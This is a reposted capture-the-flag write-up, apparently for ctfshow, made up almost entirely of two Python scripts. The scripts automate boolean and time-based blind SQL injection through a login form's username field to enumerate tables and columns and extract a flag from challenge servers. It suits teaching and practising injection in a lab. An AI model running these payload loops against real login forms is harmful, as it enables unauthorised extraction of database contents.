ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 数据库> 文章详细

SQL注入-2

2022-04-04 23:33:34  阅读:193  来源: 互联网

标签:result name num ctfshow SQL table schema 注入


简单盲注

import requests
import time

result = ""
url = 'http://986b6ffa-086c-4650-8237-9557e9bd100c.challenge.ctf.show/api/'

for i in range(80):
    min_num = 32
    max_num = 127
    while True:
        mid_num = (min_num + max_num) >> 1
        if mid_num == min_num:
            result += chr(mid_num)
            print(result)
            break
            # table_name = ctfshow_fl0g,ctfshow_user
            # column_name =  id,f1ag
        # payload = "admin' and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_user'),{},1))<{}#".format(i, mid_num)
        payload = "admin' and ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{}#".format(i, mid_num)
        data = {
            'username': payload,
            'password': 0
        }
        response = requests.post(url, data=data)
        time.sleep(0.25)
        if response.text.find('8bef') > 0:
            max_num = mid_num
        else:
            min_num = mid_num

简单时间盲注

import requests
import time

dic = ' ,ctfshow{}abdegijklmnpqruvxyz0123456789-_{}ABCDEFGHIJKLMNOPQRSTUVWXYZ'
url = 'http://414da80d-977f-4f64-baf7-5a7adbebb60a.challenge.ctf.show/api/'
result = ''

for i in range(1, 60):
    for word in dic:
        # payload = "admin' and if(left(database(),{0})='{1}',sleep(3),0)#".format(i, result + word)
        # payload = "admin' and if(left((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{0})='{1}',sleep(3),0)#".format(i, result + word)
        # payload = "admin' and if(left((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flxg'),{})='{}',sleep(3),0)#".format(i, result + word)
        payload = "admin' and if(left((select f1ag from ctfshow_flxg),{})='{}',sleep(3),0)#".format(i, result + word)
        data = {
            'username': payload,
            'password': 0
        }
        try:
            response = requests.post(url, data=data, timeout=2.5)
            time.sleep(0.25)
        except:
            result += word
            print(result)
            break

标签:result,name,num,ctfshow,SQL,table,schema,注入
来源: https://www.cnblogs.com/amazingman113/p/16101033.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有